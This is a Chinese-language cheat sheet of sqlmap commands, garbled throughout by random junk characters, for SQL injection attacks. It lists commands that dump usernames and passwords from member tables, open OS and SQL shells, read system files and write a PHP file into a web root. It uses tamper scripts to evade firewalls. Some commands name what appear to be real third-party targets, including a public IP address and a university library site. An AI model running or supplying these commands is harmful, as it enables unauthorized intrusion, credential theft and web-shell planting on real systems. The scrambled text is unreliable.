/pentest/database/sqlmap; i' g; m1 d) C
L0 p M8 d0 B2 Z3 }2 K
update :::::> in the folder after execute following order : svn update0 d8 o5 {8 i5 E2 |# j) q9 \
# [1 u% V$ f4 X; y1 D3 B+ Nsqlmap.py -r 1.txt --current-db
+ u2 z3 r5 ?1 N3 l
- ~0 ]( P- T. \5 {8 X( Y4 E) Fv 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”: ]9 P' ]4 @* E
2 z( M+ l$ ]' Q1 e" {; d' z5 {
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
% A. g) x) S' y猜解数据库 n! _: p# p3 e7 b' ~1 F& t# r3 ~
./sqlmap.py -u "injection-url" --dbs9 `: i8 {" w( [* Y" K2 K
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
3 h4 g, s/ d5 t
: h G. k1 q+ q$ c, J) t猜解表名
) }7 O9 j0 E2 M' M6 `./sqlmap.py -u "injection-url" -D database_name --tables+ Z+ W$ b' k! f5 X3 J) D
2 j; ~& O3 O8 I$ d3 V6 d g6 {
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
- H( |4 J" t" G8 C! L" w: isqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py" $ y q. @5 W, d) N
- ]" W& J Z& i4 B( W. Y) v, Usqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump9 s. o* L6 s7 }& E6 m, D
5 o4 O% X9 ]6 a2 b h; Zsqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
$ s/ B$ p( Z6 W6 S" o& I5 Wsqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
# Q1 D( ^9 w6 ?& }sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
% E0 O* F4 {' m; O' Wsqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"3 T7 }' X9 ]4 z# W6 t+ h. e
6 b' Y0 ]2 A% L0 b
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
5 f" M( Y" K4 H9 Bsqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
) v9 {+ v% A& O+ U4 G' U/ usqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"7 y9 N+ U- k9 \0 e4 d1 ?2 v
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
; r4 i/ D, k" y' ^sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump- Z( H4 Z4 A) u9 c( k
: W2 _$ x+ P$ x/ \1 t4 k4 z
sqlmap.py -r 1.txt -v 3 --dbs --batch --tamper "space2morehash.py" 绕过防火墙了
6 A& w6 O# [+ }! D0 P5 usqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py", y# ~$ s, R. x: O, i# D: `
) V5 c0 y$ C, f; O- G, ~$ k
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"" w8 u' \3 e) y
猜解列名. F0 _- c8 a, z/ b
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
% x; ?, _4 C9 K) z+ z) X4 }* [4 [9 w! C! t3 ~$ C" @5 n9 T
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
- Y' Y; o7 o" n& v3 E0 ssqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
7 }$ T- f" s( _; X+ z7 `8 a4 `sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"3 i; p" w0 n4 \: ^, k2 l0 J# i
/ D( M6 Y h8 O+ fsqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"+ g9 o. H) T, v E; [4 _6 \
&submit=Go! ~) E7 e* n# F; h
猜解值
& F) t/ p3 r7 l' A# ^% ^./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
2 u( I5 y$ P9 q1 ]* `- g- H========================================================
- c0 n0 h5 h4 {. F! `2 O搜索表名中包括mana字符的
. [/ u2 P% ^" A. m" v7 r: @/sqlmap.py -u "injection-url" -T mana --search
7 e0 d9 S7 o/ z7 w+ V: ^2 p, V返回一个交互式sql shell6 K- M/ t1 n" D3 S3 h( _
/sqlmap.py -u "injection-url" --sql-shell/ X {5 Q+ C {% [: x
读取指定文件(需权限)
0 P. J* o: S5 a( }/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
2 W9 Z. |. I/ s2 b/ R# E) \查看当前 用户 及 数据库 3 t' H- l, \2 ^
/sqlmap.py -u "injection-url" --current-user --current-db4 V* ~$ Z$ S) w# ?2 B1 w0 f
本地文件 写入 远程目标绝对路径) R/ ?1 M8 @5 L8 _- u1 }
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径0 J; d% g/ Q1 |% T9 \+ `0 D
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
7 c, X P4 {0 ]' h$ P$ f0 T# ?: [8 N; d% n7 b. ~' B
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径! G& t2 j! R+ N: C
查看某用的权限" `0 C9 ~) Z. ?6 s5 Q s
/sqlmap.py -u "injection-url" --privileges -U root
& J$ r; W, A: X5 E1 e9 ^2 E; @查看当前用户是否为dba( Y/ i1 o8 E8 m! W8 Z2 w
/sqlmap.py -u "injection-url" --is-dba) @7 ~1 w6 X. q5 q( }- L. ]( I
读取所有数据库用户或指定数据库用户的密码
9 W) P) `; ]* n$ {4 a9 [+ o- s8 d8 tsqlmap.py -r 1.txt --users --passwords L+ w* _& Q. F7 `' e
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py" * g; A, q; a- O9 ?
4 D9 {; C) a3 B' T
/sqlmap.py -u "injection-url" --passwords -U root! L/ K6 D: I7 ^# Y7 q8 @. h" R( L
; O! `. W+ _& \
--start&&--stop 与 --first&&--last 的区别& U$ O5 w1 s @/ }+ F+ G
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
- Z. H `5 `$ y! {2 Q/ w# }7 Y
. R2 m7 F a2 e7 Y5 r从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
. F. ~0 f" Y6 t/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
; R0 D* C5 y! _) Z( V8 Y/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns z5 X6 `+ i; }. s9 J! v
* Z/ g2 C' v* t$ M- G: m执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
; ~& e7 W5 h! m4 B/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"9 q; O6 f$ S, Q! p# V/ R. k; h
) y, u, | K. g+ @ |